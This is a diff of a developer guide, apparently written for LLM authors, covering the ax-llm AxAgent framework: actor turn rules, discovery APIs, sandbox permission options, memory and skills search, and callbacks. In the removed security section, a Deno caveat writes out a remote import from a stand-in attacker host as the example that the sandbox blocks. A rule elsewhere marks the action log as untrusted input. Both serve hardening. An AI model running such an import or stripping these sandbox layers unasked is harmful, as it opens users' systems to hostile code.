+ 1. In actor JS code, call `final(message)` when no extra context object is needed, or `final(task, context)` when you gathered evidence.
380
+ 2. In function handlers, use `extra.protocol.final(...)` with the same one-arg or two-arg forms.
521
381
 
522
382
  Rules:
523
383
 
@@ -544,744 +404,46 @@ const analyst = agent('context:string, query:string -> answer:string', {
544
404
  });
545
405
  ```
546
406
 
547
- Discovery APIs:
548
-
549
- - `await discoverModules(modules: string | string[])`
550
- - `await discoverFunctions(functions: string | string[])`
551
-
552
- Both return Markdown.
553
-
554
- - `discoverModules(...)` only lists modules that actually have callable entries.
555
- - Grouped modules render in the Actor prompt as `<namespace> - <selection criteria>` when criteria is provided.
556
- - If a requested module does not exist, `discoverModules(...)` returns a per-module markdown error without failing the whole call.
557
- - `discoverFunctions(...)` may include argument comments from schema descriptions and fenced code examples from `AxAgentFunction.examples`.
558
-
559
- Rules:
560
-
561
- 1. Call `discoverModules(...)`.
562
- 2. If you need multiple modules, use one batched array call such as `discoverModules(['timeRange', 'schedulingOrganizer'])`.
563
- 3. Log or inspect the returned markdown directly. Do not wrap it in JSON or custom objects.
564
- 4. If you need multiple callable definitions, prefer one batched `discoverFunctions([...])` call.
565
- 5. Do not split discovery into separate calls with `Promise.all(...)`.
566
- 6. Inspect the logged result.
567
- 7. Call `discoverFunctions(...)` for only the callables you plan to use.
568
- 8. Inspect the logged result.
569
- 9. Call discovered functions and child agents.
570
- 10. If a guessed call fails with `TypeError`, `... is not a function`, or discovery `Not found`, stop guessing nearby names. Re-run `discoverModules(...)`, then `discoverFunctions(...)`, inspect the markdown again, and call only the exact discovered qualified name.
571
- 11. If tool docs or tool error messages specify an exact literal, type, or query format, reuse that exact documented value instead of synonyms or inferred aliases.
572
-
573
- Examples:
574
-
575
- ```javascript
576
- const modules = await discoverModules(['team', 'kb', 'utils']);
577
- console.log(modules);
578
- ```
579
-
580
- ```javascript
581
- const defs = await discoverFunctions(['team.writer', 'kb.findSnippets']);
582
- console.log(defs);
583
- ```
584
-
585
- Do not:
586
-
587
- - Do not guess callable names when discovery mode is on.
588
- - Do not guess alternate callable names after invalid callable errors.
589
- - Do not assume sub-agents live under `agents` if `agentIdentity.namespace` is configured.
590
- - Do not dump large pre-known tool definitions into actor code when discovery mode is enabled.
591
- - Do not use `Promise.all(...)` to fan out discovery calls across modules or definitions.
592
- - Do not convert discovery markdown into JSON before logging or using it.
593
-
594
- ## RLM Actor Code Rules
595
-
596
- Use these rules when generating actor JavaScript for RLM in stdout mode:
597
-
598
- - Treat each actor turn as exactly one observable step.
599
- - Inspect what already exists before recomputing it. If a prior turn successfully created a value, prefer reusing that runtime value.
600
- - If you need to inspect a value, compute it or read it, `console.log(...)` it, and stop immediately after that `console.log(...)`.
601
- - On the next turn, continue from the existing runtime state and use the logged result from `Action Log` only as evidence for what happened.
602
- - If the prompt contains `Live Runtime State`, treat it as the canonical view of current variables.
603
- - Errors from child-agent or tool calls appear in `Action Log`; inspect them and fix the code on the next turn.
604
- - Non-final turns should contain exactly one `console.log(...)`.
605
- - Final turns should call `await final(outputGenerationTask, context)` or `await askClarification(...)` without `console.log(...)`.
606
- - Do not write a complete multi-step program in one actor turn.
607
- - Do not re-declare or recompute values just because older turns are summarized; only rebuild after an explicit runtime restart or when you intentionally want a new value.
608
- - Do not assume older successful turns remain fully replayed; adaptive or lean policies may collapse them into a `Checkpoint Summary` block or compact action summaries.
609
-
610
- Small reuse example:
611
-
612
- Turn 1:
613
-
614
- ```javascript
615
- const customers = await kb.findCustomers({ segment: 'active' });
616
- console.log(customers.length);
617
- ```
618
-
619
- Turn 2:
620
-
621
- ```javascript
622
- const topCustomers = customers.slice(0, 3);
623
- console.log(topCustomers);
624
- ```
625
-
626
- Reason: turn 2 reuses `customers` from the persistent runtime. `Live Runtime State` or summaries may change how turn 1 is shown in the prompt, but they do not remove the value from the runtime session.
627
-
628
- ## AxJSRuntime Security
629
-
630
- Default `new AxJSRuntime()` is hardened: no network, no fs, no child_process, `import()` blocked, intrinsics frozen, `ShadowRealm` locked to `undefined`, worker IPC locked in browser/Deno/Bun, Bun workers use `smol: true`, and on Node 20+ the OS Permission Model auto-engages (using `--permission` on Node 23.5+ or `--experimental-permission` on Node 20–23.4) as a second defense layer. You do not need to configure anything to get the strict profile — opt in only to the capability the user actually asked for.
631
-
632
- **Permission enum** (`AxJSRuntimePermission`):
633
- `NETWORK`, `STORAGE`, `CODE_LOADING`, `COMMUNICATION`, `TIMING`, `WORKERS`, `FILESYSTEM` (new), `CHILD_PROCESS` (new).
634
-
635
- **Options quick reference** (all defaults shown are secure):
636
-
637
- | Option | Default | Effect |
638
- |---|---|---|
639
- | `blockDynamicImport` | `true` | Blocks `import()` + Function/eval constructor shims. |
640
- | `allowedModules` | `[]` | Whitelist of specifiers permitted when `blockDynamicImport` is on. |
641
- | `freezeIntrinsics` | `true` | Freezes `Object`/`Array`/`Promise`/etc. prototypes. |
642
- | `blockShadowRealm` | `true` | Locks `globalThis.ShadowRealm` to `undefined`. |
643
- | `lockWorkerIPC` | `true` | Locks `self.postMessage`/`onmessage` in browser/Deno/Bun workers. |
644
- | `preventGlobalThisExtensions` | `false` | Opt-in; breaks top-level `var/let/const` persistence across turns. |
645
- | `useNodePermissionModel` | `'auto'` | Engages Node Permission Model on Node 20+ (`--permission` on 23.5+, `--experimental-permission` on 20–23.4); skips on Bun, Deno, browsers, and older Node. |
646
- | `nodePermissionAllowlist` | `undefined` | Fine-grained `{ fsRead, fsWrite, childProcess, addons, wasi }`. |
647
- | `resourceLimits` | `undefined` | `{ maxOldGenerationSizeMb, maxYoungGenerationSizeMb, codeRangeSizeMb, stackSizeMb }`. |
648
- | `allowDenoRemoteImport` | `false` | On Deno, controls whether `NETWORK` also grants remote module loading. |
649
- | `allowUnsafeNodeHostAccess` | `false` | Exposes `process`/`require` in Node — trusted-code only. |
650
-
651
- **Recipes:**
652
-
653
- Maximum security (default):
654
- ```ts
655
- new AxJSRuntime();
656
- ```
657
-
658
- Allow fetch only:
659
- ```ts
660
- new AxJSRuntime({ permissions: [AxJSRuntimePermission.NETWORK] });
661
- ```
662
-
663
- Allow fs scoped to one directory:
664
- ```ts
665
- new AxJSRuntime({
666
- permissions: [AxJSRuntimePermission.FILESYSTEM],
667
- allowedModules: ['node:fs', 'node:fs/promises', 'node:path'],
668
- useNodePermissionModel: 'auto',
669
- nodePermissionAllowlist: {
670
- fsRead: ['/app/data'],
671
- fsWrite: ['/app/data'],
672
- },
673
- });
674
- ```
675
-
676
- Trust the code (explicit opt-out of every layer):
677
- ```ts
678
- new AxJSRuntime({
679
- permissions: Object.values(AxJSRuntimePermission),
680
- allowUnsafeNodeHostAccess: true,
681
- blockDynamicImport: false,
682
- blockShadowRealm: false,
683
- freezeIntrinsics: false,
684
- lockWorkerIPC: false,
685
- useNodePermissionModel: false,
686
- });
687
- ```
688
-
689
- **Rules for the LLM author:**
690
-
691
- - Default to `new AxJSRuntime()` with no options unless the user asked for a specific capability.
692
- - When the user asks for `fetch`, add `permissions: [AxJSRuntimePermission.NETWORK]` — do not disable `blockDynamicImport` as a workaround.
693
- - When the user asks for `fs`, add both `permissions: [AxJSRuntimePermission.FILESYSTEM]` AND `allowedModules: ['node:fs', 'node:fs/promises', 'node:path']`. Scope with `nodePermissionAllowlist` when the user names a directory.
694
- - Do not disable `freezeIntrinsics`, `blockShadowRealm`, or `lockWorkerIPC` unless the user explicitly asks — these do not trade off against any legitimate RLM use case.
695
- - Treat `allowUnsafeNodeHostAccess: true` as a red flag; only use it when the user is authoring trusted code in their own process.
696
- - `preventGlobalThisExtensions: true` breaks top-level `var/let/const` persistence across turns — never set it for stdout-mode RLM where persistence is load-bearing (see `RLM Actor Code Rules`).
697
-
698
- **Deno caveat:** `blockDynamicImport` is a no-op in Deno (no `node:vm`); the defense there is the worker permission sandbox applied by default. When `NETWORK` is granted on Deno, `import` is set to `false` by default so `await import('https://attacker.example/evil.ts')` is blocked at the runtime level — pass `allowDenoRemoteImport: true` only if remote module loading is genuinely required.
699
-
700
- ## RLM Test Harness
701
-
702
- Use `agent.test(code, contextFieldValues?, options?)` when the user wants to validate JavaScript snippets against the actual AxAgent runtime environment without running the full Actor/Responder loop.
703
-
704
- ```typescript
705
- import { AxJSRuntime, agent, f, fn } from '@ax-llm/ax';
706
-
707
- const runtime = new AxJSRuntime();
708
-
709
- const tools = [
710
- fn('sum')
711
- .description('Return the sum of the provided numeric values')
712
- .namespace('math')
713
- .arg('values', f.number('Value to add').array())
714
- .returns(f.number('Sum of all values'))
715
- .handler(async ({ values }) =>
716
- values.reduce((total, value) => total + value, 0)
717
- )
718
- .build(),
719
- ];
720
-
721
- const contextHarness = agent('label:string, values:number[] -> answer:string', {
722
- contextFields: ['label', 'values'],
723
- runtime,
724
- contextPolicy: { preset: 'checkpointed', budget: 'balanced' },
725
- });
726
-
727
- const contextOutput = await contextHarness.test(
728
- [
729
- 'const total = values.reduce((sum, value) => sum + value, 0);',
730
- 'console.log(`${label}: ${total}`)',
731
- ].join('\n'),
732
- { label: 'sum the values', values: [3, 5, 8] }
733
- );
734
-
735
- const toolHarness = agent('query:string -> answer:string', {
736
- contextFields: [],
737
- runtime,
738
- functions: tools,
739
- contextPolicy: { preset: 'checkpointed', budget: 'balanced' },
740
- });
741
-
742
- const toolOutput = await toolHarness.test(
743
- 'console.log(await math.sum({ values: [3, 5, 8] }))'
744
- );
745
-
746
- console.log(contextOutput);
747
- console.log(toolOutput);
748
- ```
749
-
750
- Rules:
751
-
752
- - `test(...)` creates a fresh runtime session per call.
753
- - Context-field snippets run in the context/distiller runtime and expose `inputs` plus non-colliding top-level aliases for configured `contextFields`.
754
- - Tool snippets should use an agent with no `contextFields`, or test the executor stage directly, so namespaced functions, child agents, and `llmQuery` are in scope.
755
- - In `AxJSRuntime`, do not rely on calling `inspectRuntime()` from inside `test(...)` snippets yet; prefer checking runtime globals directly inside the snippet.
756
- - It returns the formatted runtime output string.
757
- - It throws on runtime failures instead of returning LLM-style error strings.
758
- - Do not call `final(...)` or `askClarification(...)` inside `test(...)` snippets.
759
- - Pass only `contextFields` values to `test(...)`; it is not a general way to inject arbitrary non-context inputs.
760
- - If the snippet uses `llmQuery(...)`, provide an AI service through the agent config or `options.ai`.
761
-
762
- ## RLM Adaptive Replay
763
-
764
- Prefer this configuration for long, multi-turn runtime analysis:
765
-
766
- ```typescript
767
- const analyst = agent(
768
- 'context:string, question:string -> answer:string, findings:string[]',
769
- {
770
- contextFields: ['context'],
771
- runtime: new AxJSRuntime(),
772
- maxTurns: 10,
773
- contextPolicy: {
774
- preset: 'adaptive',
775
- budget: 'balanced',
776
- },
777
- }
778
- );
779
- ```
780
-
781
- Rules:
782
-
783
- - Use `preset: 'full'` when the actor should keep seeing raw prior code and outputs with minimal compression.
784
- - Use `preset: 'adaptive'` when the task needs runtime state across many turns but older successful work should collapse into checkpoint summaries while important recent steps can still stay fully replayed.
785
- - Use `preset: 'checkpointed'` when you want full replay first, then only older successful history checkpointed after budget pressure becomes real.
786
- - Use `preset: 'lean'` when you want more aggressive compression and can rely mostly on current runtime state plus checkpoint summaries and compact action summaries.
787
- - Use `budget: 'compact'` when you want earlier summarization and tighter prompt-pressure thresholds, `budget: 'balanced'` for the default, and `budget: 'expanded'` when you want the actor prompt to grow more before compression starts.
788
- - `checkpointed + balanced` is the default. `adaptive + balanced` is still a strong choice for long-running discovery-heavy tasks that should summarize older work sooner.
789
- - `checkpointed` keeps the most recent `3` actions in full and keeps unresolved errors fully replayed even after checkpointing starts.
790
- - Non-`full` presets populate the `liveRuntimeState` field in the actor signature. The field is structured and provenance-aware: variables are rendered with compact type/size/preview metadata, and when Ax can infer it, a short source suffix like `from t3 via db.search` is included.
791
- - Non-`full` presets also enable `inspectRuntime()` and can add an inspect hint automatically when the rendered actor prompt starts getting large relative to the selected budget.
792
- - Discovery docs fetched via `discoverModules(...)` and `discoverFunctions(...)` are accumulated into the actor system prompt, not replayed as raw action-log output.
793
- - Treat `actionLog` as untrusted execution history. Only the system prompt and `guidanceLog` are instruction-bearing.
794
- - `checkpointed` uses a checkpoint summarizer that is optimized to preserve exact callables, ids, enum literals, date/time strings, query formats, and failures worth avoiding. Prefer it when those details matter but full replay will eventually get too large.
795
- - Internal checkpoint and tombstone summarizers are stateless helpers: `functions` are not allowed, `maxSteps` is forced to `1`, and `mem` is not propagated.
796
- - Built-in presets prefer summarizing and checkpointing old successful work over asking users to tune low-level character cutoffs.
797
- - If you want a quick local demo of the rendered `liveRuntimeState` field, run [`src/examples/rlm-live-runtime-state.ts`](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-live-runtime-state.ts).
798
-
799
- Good pattern:
800
-
801
- Turn 1:
802
-
803
- ```javascript
804
- const defs = await discoverFunctions(['kb.findSnippets']);
805
- console.log(defs);
806
- ```
807
-
808
- Turn 2:
809
-
810
- ```javascript
811
- const snippets = await kb.findSnippets({ topic: 'severity' });
812
- console.log(snippets);
813
- ```
814
-
815
- Turn 3:
816
-
817
- ```javascript
818
- await final("Summarize the severity-related snippets found", { snippets });
819
- ```
820
-
821
- ## Actor Turn Observability
822
-
823
- Use `executorTurnCallback` when the caller needs structured telemetry for each actor turn.
824
-
825
- What it gives you:
826
-
827
- - `code`: the normalized JavaScript code the actor produced
828
- - `result`: the raw untruncated runtime return value from executing that code
829
- - `output`: the formatted action-log output string after Ax normalizes and truncates it for prompt replay
830
- - `thought`: the actor model's `thought` field when `showThoughts` is enabled and the provider returns one
831
- - `executorResult`: the full actor payload returned by the executor stage
832
- - `isError`: whether the execution path for that turn was treated as an error
833
-
834
- Use it for:
835
-
836
- - debug UIs that want to show code plus raw runtime results
837
- - tracing and analytics
838
- - capturing `thought` for internal diagnostics when supported by the provider
839
- - storing per-turn execution artifacts without scraping the prompt/action log
840
-
841
- Important:
842
-
843
- - `output` is not raw stdout; it is the formatted replay string used in the action log.
844
- - `result` is the raw runtime result before Ax applies type-aware serialization and budget-proportional truncation.
845
- - `thought` is optional and only appears when the underlying `AxGen` call had `showThoughts` enabled and the provider actually returned a thought field.
846
- - `actionLogEntryCount` and `guidanceLogEntryCount` reflect the live log sizes after the turn is processed, including resumed runs.
847
-
848
- Good pattern:
849
-
850
- ```typescript
851
- const supportAgent = agent('query:string -> answer:string', {
852
- contextFields: ['query'],
853
- runtime,
854
- executorTurnCallback: ({
855
- turn,
856
- actionLogEntryCount,
857
- guidanceLogEntryCount,
858
- code,
859
- result,
860
- output,
861
- thought,
862
- isError,
863
- }) => {
864
- console.log({
865
- turn,
866
- actionLogEntryCount,
867
- guidanceLogEntryCount,
868
- isError,
869
- code,
870
- rawResult: result,
871
- replayOutput: output,
872
- thought,
873
- });
874
- },
875
- executorOptions: {
876
- model: 'gpt-5.4-mini',
877
- showThoughts: true,
878
- },
879
- });
880
- ```
881
-
882
- ## Context Event Observability
407
+ Discovery API:
883
408
 
884
- Use `onContextEvent` when the caller needs structured telemetry about prompt pressure and compaction. It does not change model behavior directly; it is for logs, evals, and dashboards.
409
+ - `await discover(item: string): void`
410
+ - `await discover(items: string[]): void`
411
+ - `await discover({ tools?: string | string[], skills?: string | string[] }): void` when `onSkillsSearch` is configured
885
412
 
886
- Events:
887
-
888
- - `budget_check`: character-based prompt pressure before an actor turn, with detailed metrics kept out of the actor prompt.
889
- - `checkpoint_created` / `checkpoint_cleared`: checkpoint lifecycle events with covered turns and reason.
890
- - `tombstone_created`: compact resolved-error summary creation.
413
+ Discovery returns `void`; fetched docs render in the next executor prompt.
891
414
 
892
415
  Rules:
893
416
 
894
- - `contextPressure` in the actor prompt is intentionally compact (`ok`, `watch`, `critical` plus one short instruction).
895
- - Budget metrics are character-based for provider neutrality and are exposed through `onContextEvent`, not the actor prompt.
896
- - Callback errors are swallowed so telemetry cannot break the agent run.
897
-
898
- ```typescript
899
- const supportAgent = agent('query:string -> answer:string', {
900
- contextFields: ['query'],
901
- runtime,
902
- contextPolicy: { preset: 'checkpointed', budget: 'balanced' },
903
- onContextEvent: (event) => {
904
- if (event.kind === 'budget_check') {
905
- console.log(event.pressure, event.mutablePromptChars);
906
- }
907
- },
908
- });
909
- ```
910
-
911
- ## Agent Status Callback
912
-
913
- Use `agentStatusCallback` when the caller wants real-time progress updates from the actor. When set, the actor can call `await reportSuccess(message)` and `await reportFailure(message)` in its JavaScript turns.
914
-
915
- ```typescript
916
- const supportAgent = agent('query:string -> answer:string', {
917
- contextFields: ['query'],
918
- runtime,
919
- agentStatusCallback: (message, status) => {
920
- console.log(`[${status}] ${message}`);
921
- },
922
- });
923
- ```
924
-
925
- Rules:
926
-
927
- - `agentStatusCallback` receives `(message: string, status: 'success' | 'failed')`.
928
- - When set, the actor prompt automatically includes `reportSuccess(message)` and `reportFailure(message)` as available runtime functions.
929
- - The actor is instructed to keep the user updated of task progress.
930
- - `reportSuccess` and `reportFailure` are reserved runtime names when the callback is configured.
931
- - Child agents inherit the callback via the rlm config.
932
-
933
- ## On Function Call
934
-
935
- Use `onFunctionCall` when the caller wants to observe every function call the actor makes from the JS runtime. Fires before the underlying function runs.
936
-
937
- ```typescript
938
- const supportAgent = agent('query:string -> answer:string', {
939
- contextFields: ['query'],
940
- runtime,
941
- functions: [helperAgent, { name: 'lookupOrder', namespace: 'tools', /* ... */ }],
942
- onFunctionCall: ({ name, qualifiedName, args, kind }) => {
943
- console.log(`[${kind}] ${qualifiedName}`, args);
944
- },
945
- });
946
- ```
947
-
948
- Rules:
949
-
950
- - Receives `{ name, qualifiedName, args, kind }` where:
951
- - `name` is the bare function name (e.g. `'lookupOrder'`).
952
- - `qualifiedName` is the namespaced name as the actor sees it (e.g. `'tools.lookupOrder'`); for un-namespaced runtime globals it equals `name`.
953
- - `args` is the resolved positional/named arguments object (`Record<string, unknown>`).
954
- - `kind` is `'external'` for caller-registered `functions`, `'internal'` for agent-injected globals: child `agents`, `discoverModules`, `discoverFunctions` (when `functionDiscovery: true`), and `consult` (when `onSkillsSearch` is set).
955
- - Fires once per call, before the function executes. Errors thrown inside the callback are swallowed so they cannot break the actor loop.
956
- - Independent from the DSP-layer `onFunctionCall` on `AxProgramForwardOptions` — that hook is for LLM tool-calls and never fires under AxAgent (the agent injects functions as runtime globals, not as LLM tools).
957
-
958
- ## Memory Search
417
+ - `discover('kb')` loads a module callable list when `kb` is a discoverable module.
418
+ - `discover('kb.findSnippets')` loads a full callable definition.
419
+ - `discover('lookup')` resolves as `utils.lookup`.
420
+ - `discover({ tools: ['kb'], skills: ['release-checklist'] })` loads tool docs and skill bodies in one turn.
421
+ - Call one batched `discover(...)` with every module, callable, and skill you need.
422
+ - Do not split discovery into separate calls or wrap discovery in `Promise.all(...)`.
423
+ - Read the next prompt's "Discovered Tool Docs" and "Loaded Skills" sections.
424
+ - If a guessed call fails, stop guessing nearby names. Run `discover(...)` for that module or function and call only the exact discovered qualified name.
959
425
 
960
- Use `onMemoriesSearch` when the agent needs to pull task-relevant context — user preferences, prior decisions, project facts, past conversations — from an external store (vector DB, BM25, KV) instead of stuffing everything into the prompt upfront. The actor decides what to load, when, and how much.
961
-
962
- When `onMemoriesSearch` is set, the distiller and executor stages gain:
963
-
964
- 1. An `inputs.memories` field — an array of `{ id, content }` entries the actor reads directly. Each `content` is opaque markdown (frontmatter, if any, is not parsed).
965
- 2. A `recall(searches: string[]): void` global the actor `await`s to load more entries. Recalled entries are appended to `inputs.memories` and visible from the next turn onward — similar to how `guidance` accumulates. **`recall()` returns nothing**; read `inputs.memories` next turn to see what landed.
966
-
967
- The responder stage does not receive memories.
968
-
969
- ### Enabling
970
-
971
- ```typescript
972
- import { agent } from '@ax-llm/ax';
973
- import type { AxAgentMemoriesSearchFn } from '@ax-llm/ax';
974
-
975
- // Each result must be { id: string; content: string }
976
- const onMemoriesSearch: AxAgentMemoriesSearchFn = async (
977
- searches,
978
- alreadyLoaded
979
- ) => {
980
- // `searches` is the full array passed to recall(...) — batch your
981
- // store lookup in one round-trip.
982
- // `alreadyLoaded` is the snapshot of `inputs.memories` already in
983
- // scope. Filter your results so you don't refetch what's already
984
- // loaded (the runtime dedupes by id, but skipping here saves a
985
- // round-trip and avoids charging the actor for duplicate tokens).
986
- const skip = new Set(alreadyLoaded.map((m) => m.id));
987
- const fresh = await myVectorDB.searchBatch(searches, { topK: 3 });
988
- return fresh.filter((m) => !skip.has(m.id));
989
- };
990
-
991
- const myAgent = agent({
992
- // ...
993
- onMemoriesSearch,
994
- });
995
- ```
996
-
997
- ### Actor usage (distiller or executor code)
998
-
999
- ```javascript
1000
- // Turn 1: kick off a batched lookup. Pass all queries in one call —
1001
- // don't loop or use Promise.all (the runtime rejects that as a policy
1002
- // violation; your callback should fan out internally).
1003
- await recall(['user preferences', 'project constraints']);
1004
-
1005
- // Turn 2+: matched entries are now visible on `inputs.memories`.
1006
- const prefs = inputs.memories.find(m => m.id === 'user-prefs-v2');
1007
- ```
1008
-
1009
- ### Behaviour
1010
-
1011
- - `recall()` invokes `onMemoriesSearch` with `(searches, alreadyLoaded)` and returns `void`. `alreadyLoaded` is the current `inputs.memories` snapshot — filter your store results against it to skip duplicates. Results land on `inputs.memories` for subsequent turns.
1012
- - Entries are **deduped by `id`** (last-write-wins) and **sorted by `id`** for prefix-cache stability.
1013
- - Memories loaded by the distiller **thread automatically to the executor** — no second `recall()` needed for those entries.
1014
- - `recall()` may be called multiple times per turn; results accumulate. The merge dedupes against existing entries, so re-running the same search is cheap.
1015
- - **Lifetime is one `.forward()` call.** `inputs.memories` resets between calls. To carry memories across calls, persist them in your store and recall them again on the next call.
1016
-
1017
- ### Child agents
1018
-
1019
- Child agents do **not** inherit `onMemoriesSearch` automatically. If a recursive `llmQuery` advanced child or a registered child agent should also have `recall()`, set `onMemoriesSearch` on that agent's options explicitly.
1020
-
1021
- ### Carrying memories across `.forward()` calls
1022
-
1023
- `inputs.memories` resets between runs. To preserve continuity across calls, observe loads with `onUsedMemories` and replay them on the next call's first `recall()` (or via your store):
1024
-
1025
- ```typescript
1026
- const carried = new Map<string, string>();
1027
-
1028
- const myAgent = agent({
1029
- // ...
1030
- onMemoriesSearch: async (searches) => {
1031
- const fresh = await myVectorDB.searchBatch(searches, { topK: 3 });
1032
- // Re-surface anything that landed on prior runs so the actor sees it
1033
- // alongside fresh matches.
1034
- const carriedAsResults = [...carried.entries()].map(([id, content]) => ({
1035
- id,
1036
- content,
1037
- }));
1038
- return [...carriedAsResults, ...fresh];
1039
- },
1040
- onUsedMemories: (results) => {
1041
- for (const r of results) carried.set(r.id, r.content);
1042
- },
1043
- });
1044
- ```
1045
-
1046
- ## Skills Search
1047
-
1048
- Use `onSkillsSearch` when the agent needs to load skill guides — usage instructions, runbooks, domain conventions — into the executor's system prompt on demand. The actor decides which skills to fetch and when, so you don't pre-render every skill into every prompt.
1049
-
1050
- When `onSkillsSearch` is set, the executor stage gains:
1051
-
1052
- 1. A "Loaded Skills" section in the system prompt that renders matched skill bodies (sorted by `name`).
1053
- 2. A `consult(searches: string[]): void` global the actor `await`s to load more skills. Loaded entries appear in the next turn's prompt — `consult()` itself returns nothing.
1054
-
1055
- The distiller and responder do not see skills. Only the executor.
1056
-
1057
- ### Enabling
1058
-
1059
- ```typescript
1060
- import { agent } from '@ax-llm/ax';
1061
- import type { AxAgentSkillsSearchFn } from '@ax-llm/ax';
1062
-
1063
- // Each result must be { name: string; content: string }
1064
- const onSkillsSearch: AxAgentSkillsSearchFn = async (searches) => {
1065
- return mySkillStore.searchBatch(searches, { topK: 2 });
1066
- };
1067
-
1068
- const myAgent = agent({
1069
- // ...
1070
- onSkillsSearch,
1071
- });
1072
- ```
1073
-
1074
- ### Actor usage (executor code only)
1075
-
1076
- ```javascript
1077
- // Pass all queries in one call — don't loop or use Promise.all (the
1078
- // runtime rejects that as a policy violation; your callback should
1079
- // fan out internally).
1080
- await consult(['release-checklist', 'incident-response']);
1081
-
1082
- // Next turn: the loaded skill bodies render under the "Loaded Skills"
1083
- // system-prompt section, ready to apply directly.
1084
- ```
1085
-
1086
- ### Behaviour
1087
-
1088
- - `consult()` invokes `onSkillsSearch` with the raw search strings and returns `void`. Matched skills land under "Loaded Skills" for the next turn.
1089
- - Entries are deduped by `name` (last-write-wins) and sorted by `name` for prefix-cache stability.
1090
- - **Skills persist on the agent's `currentSkillsPromptState` across `.forward()` calls** (unlike memories). Use `agent.getState()` / `setState(...)` to serialize/restore.
1091
- - `consult()` may be called multiple times; results accumulate.
1092
- - Child agents do **not** inherit `onSkillsSearch` — wire it explicitly per agent.
1093
-
1094
- ### Preloading Skills (`skills` option)
1095
-
1096
- If the caller already knows which skills are relevant, pass them up-front instead of round-tripping through `consult()`:
1097
-
1098
- - **Init-time** — `skills` on `AxAgentOptions` (constructor) seeds the executor's prompt at agent creation. They survive `setState(...)` resets, so they're always present from turn 1.
1099
- - **Forward-time** — `skills` on the `forward(ai, values, { skills })` options merge in at the start of that call (executor stage only — distiller and responder ignore it).
1100
-
1101
- Both accept the same shape `onSkillsSearch` returns: `readonly AxAgentSkillResult[]` (`{ name, content }[]`). Forward overrides init by `name` (same `Map.set` semantics as runtime-loaded skills). `onUsedSkills` is **not** fired for preset skills — that callback is for runtime `consult(...)` analytics.
1102
-
1103
- ```ts
1104
- const agent = new AxAgent(
1105
- { signature: '...', agentIdentity: { name: 'release-bot', namespace: 'utils' } },
1106
- { skills: [{ name: 'release-checklist', content: '...' }] }
1107
- );
1108
-
1109
- await agent.forward(ai, values, {
1110
- // overrides any same-named init skill, layers on top of runtime consult() loads
1111
- skills: [{ name: 'incident-response', content: '...' }],
1112
- });
1113
- ```
1114
-
1115
- You can use `skills` without setting `onSkillsSearch` at all — handy for static guides where the actor never needs to fetch more.
1116
-
1117
- ## Option Layout
1118
-
1119
- Use these top-level controls consistently:
1120
-
1121
- - `mode`: controls whether `llmQuery(...)` stays simple or delegates to recursive child agents in advanced mode
1122
- - `recursionOptions.maxDepth`: limits recursive `llmQuery(...)` depth
1123
- - `maxSubAgentCalls`: shared delegated-call budget across the whole run, including recursive children (default: 100)
1124
- - `maxRuntimeChars`: runtime/output truncation ceiling for console logs, tool results, and interpreter output replay. The actual limit is computed dynamically each turn based on remaining context budget (see **Dynamic Output Truncation** below)
1125
- - `summarizerOptions`: default model/options for the internal checkpoint summarizer
1126
- - `contextOptions`: distiller-stage forward options (description, model, maxTurns, etc.). One of three peer stage-config bags.
1127
- - `executorOptions`: executor-stage forward options such as `description`, `model`, `modelConfig`, `thinkingTokenBudget`, and `showThoughts`
1128
- - `executorModelPolicy`: executor-only model override rules based on consecutive error turns or discovery fetches from listed namespaces
1129
- - `responderOptions`: responder-stage forward options
1130
- - `agentStatusCallback`: real-time progress updates from actor via `reportSuccess(message)` and `reportFailure(message)`
1131
- - `onFunctionCall`: observe every runtime function call (`{ name, qualifiedName, args, kind: 'internal' | 'external' }`)
1132
- - `judgeOptions`: built-in judge options for `agent.optimize(...)`; for tuning workflows use the `ax-agent-optimize` skill
1133
- - `bubbleErrors`: error classes that propagate out of function handlers, actor code, and llmQuery sub-agents directly to `.forward()` instead of being caught and returned as `[ERROR]` strings
426
+ ## Threading Parent Fields Into Child Agents
1134
427
 
1135
- Canonical shape:
428
+ If a child agent requires a parent field such as `audience`, declare it on the child's signature and pass it explicitly when calling the child from the actor:
1136
429
 
1137
430
  ```typescript
1138
- const researchAgent = agent('query:string -> answer:string', {
1139
- contextFields: ['query'],
1140
- runtime,
1141
- mode: 'advanced',
1142
- recursionOptions: {
1143
- maxDepth: 2,
1144
- },
1145
- maxRuntimeChars: 3000,
1146
- summarizerOptions: {
1147
- model: 'gpt-5.4-mini',
1148
- modelConfig: { temperature: 0.1, maxTokens: 180 },
1149
- },
1150
- contextPolicy: {
1151
- preset: 'checkpointed',
1152
- budget: 'balanced',
1153
- },
1154
- contextOptions: {
1155
- model: 'gpt-5.4-mini',
1156
- maxTurns: 3,
1157
- },
1158
- executorOptions: {
1159
- description: 'Use tools first and keep JS steps small.',
1160
- model: 'gpt-5.4-mini',
1161
- },
1162
- executorModelPolicy: [
1163
- {
1164
- model: 'gpt-5.4',
1165
- aboveErrorTurns: 2,
1166
- namespaces: ['db', 'kb'],
1167
- },
1168
- ],
1169
- responderOptions: {
1170
- model: 'gpt-5.4-mini',
431
+ const writingCoach = agent('draft:string, audience:string -> revision:string', {
432
+ agentIdentity: {
433
+ name: 'Writing Coach',
434
+ description: 'Polishes summaries for a target audience',
435
+ namespace: 'team',
1171
436
  },
437
+ contextFields: [],
1172
438
  });
1173
- ```
1174
-
1175
- Semantics:
1176
-
1177
- - `mode` stays top-level; there is no `recursionOptions.mode`.
1178
- - `maxRuntimeChars` sets the truncation ceiling and is separate from `contextPolicy.budget`. The effective limit per turn is computed dynamically (see below).
1179
- - `summarizerOptions` tunes only the internal checkpoint summarizer. It does not change actor or responder model selection.
1180
- - The current merged actor model stays the default base model. `executorModelPolicy` only overrides it when a rule matches.
1181
- - `executorModelPolicy` only switches the actor model. It does not change `responderOptions.model`.
1182
- - Recursive child agents can inherit `executorModelPolicy`; use a child override only when that child needs different routing behavior.
1183
- - `executorModelPolicy` entries are ordered from weaker to stronger. If multiple rules match, the last matching entry wins.
1184
- - If one entry also defines `namespaces`, any successful `discoverFunctions(...)` fetch from one of those namespaces marks the rule as matched starting on the next actor turn.
1185
-
1186
- When choosing these options for a user:
1187
-
1188
- - Do not add `mode: 'advanced'` just because recursion exists as a feature. Add it only when delegated children need their own tool/discovery/runtime loop.
1189
- - Do not add `recursionOptions` at all if the user does not need recursive delegation.
1190
- - Do not add `judgeOptions` in normal agent examples; reserve that for optimize/eval workflows.
1191
